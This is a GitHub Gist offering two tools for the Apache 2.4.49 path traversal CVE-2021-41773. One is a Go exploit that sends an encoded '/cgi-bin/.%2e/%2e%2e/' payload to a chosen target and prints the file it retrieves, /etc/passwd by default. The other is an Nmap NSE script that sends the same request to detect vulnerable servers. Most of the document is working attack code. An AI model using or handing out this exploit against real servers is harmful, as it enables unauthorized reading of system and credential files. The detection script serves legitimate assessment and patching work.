Last active
October 7, 2021 05:01
-
-
Save slayerlab/ef70997e34f547a8916a324e7120962b to your computer and use it in GitHub Desktop.
A collection to exploit and assess the CVE-2021-41773 vulnerability regardless of your OS.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "fmt" | |
| "flag" | |
| "net/http" | |
| "io/ioutil" | |
| "strings" | |
| "os" | |
| ) | |
| func init() { | |
| flag.Usage = func() { | |
| h := []string { | |
| "Usage message:", | |
| "", | |
| "Options:", | |
| " -t, --target http(s)://[target] Request to the target domain", | |
| " -p, --path [path] Command Line to execute remotely", | |
| "", | |
| } | |
| fmt.Fprintf(os.Stderr, strings.Join(h, "\n")) | |
| } | |
| } | |
| func main() { | |
| var target string | |
| flag.StringVar(&target, "target", "", "") | |
| flag.StringVar(&target, "t", "", "") | |
| var path string | |
| flag.StringVar(&path, "path", "/etc/passwd", "") | |
| flag.StringVar(&path, "p", "/etc/passwd", "") | |
| flag.Parse() | |
| if target == "" { | |
| flag.Usage() | |
| os.Exit(1) | |
| } | |
| res, err := http.Get(target+"/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/"+path) | |
| if err != nil { | |
| fmt.Println("[!] error: http.Get(target)") | |
| } | |
| defer res.Body.Close() | |
| req, err := ioutil.ReadAll(res.Body) | |
| if err != nil { | |
| fmt.Println("[!] error: ioutil.ReadAll(resp.Body)") | |
| } | |
| fmt.Println(string(req)) | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| local http = require "http" | |
| local stdnse = require "stdnse" | |
| local shortport = require "shortport" | |
| local table = require "table" | |
| local string = require "string" | |
| local vulns = require "vulns" | |
| description = [[ | |
| This NSE script identifies whether specified web domain is VULNERABLE | |
| to the Apache 2.4.49 Path Traversal (CVE-2021-41773). | |
| ]] | |
| --- | |
| -- @usage | |
| -- nmap --script http-vuln-cve2021-41773 --script-args http.useragent="[user-agent]" <target> | |
| -- nmap --script http-vuln-cve2021-41773 --script-args payload="/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/" <target> | |
| -- nmap --script http-vuln-cve2021-41773 --script-args path="/etc/passwd" <target> | |
| -- | |
| -- @output | |
| -- PORT STATE SERVICE REASON | |
| -- 80/tcp open http syn-ack | |
| -- | http-vuln-cve2021-41773: | |
| -- | VULNERABLE: | |
| -- | Apache 2.4.49 Path Traversal Vulnerability | |
| -- | State: VULNERABLE | |
| -- | IDs: 1:CVE-2021-41773 | |
| -- | The Apache HTTP Server 2.4.49 has a path traversal vulnerability which | |
| -- | an attacker can map URLs to files outside the expected document root. | |
| -- | | |
| -- | If files outside of the document root are not protected by | |
| -- | "Require all denied" policy, these requests can succeed. | |
| -- | | |
| -- | Additionally, this vulnerability could leak the interpreted source | |
| -- | like CGI and PHP scripts. This issue only affects Apache 2.4.49 | |
| -- | and not earlier versions. (Fixed on Apache httpd 2.4.50) | |
| -- | | |
| -- | Disclosure date: 2021-10-05 | |
| -- | References: | |
| -- |_ https://nvd.nist.gov/vuln/detail/CVE-2021-41773 | |
| --- | |
| author = "Leonardo Sena (slayer.blog)" | |
| license = "WTFPL" | |
| categories = {"default", "discovery", "safe", "vuln", "exploit"} | |
| portrule = shortport.http | |
| action = function(host, port) | |
| local vuln = { | |
| title = "Apache 2.4.49 Path Traversal Vulnerability", | |
| state = vulns.STATE.NOT_VULN, | |
| description = [[ | |
| The Apache HTTP Server 2.4.49 has a path traversal vulnerability which | |
| an attacker can map URLs to files outside the expected document root. | |
| If files outside of the document root are not protected by | |
| "Require all denied" policy, these requests can succeed. | |
| Additionally, this vulnerability could leak the interpreted source | |
| like CGI and PHP scripts. This issue only affects Apache 2.4.49 | |
| and not earlier versions. (Fixed on Apache httpd 2.4.50) | |
| ]], | |
| IDS = { 'CVE-2021-41773' }, | |
| references = { 'https://nvd.nist.gov/vuln/detail/CVE-2021-41773' }, | |
| dates = { | |
| disclosure = { year='2021', month='10', day='05' } | |
| } | |
| } | |
| local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) | |
| local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "GET" | |
| local payload = stdnse.get_script_args(SCRIPT_NAME..".payload") or "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/" | |
| local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/etc/passwd" | |
| local response = http.generic_request(host, port, method, payload..path) | |
| local notvuln = {} | |
| notvuln['name'] = "CVE-2021-41773" | |
| if response and response.status == 200 then | |
| vuln.state = vulns.STATE.VULN | |
| return vuln_report:make_output(vuln) | |
| elseif response and response.status ~= 200 then | |
| table.insert(notvuln, "NOT VULNERABLE") | |
| return stdnse.format_output(true, notvuln) | |
| end | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment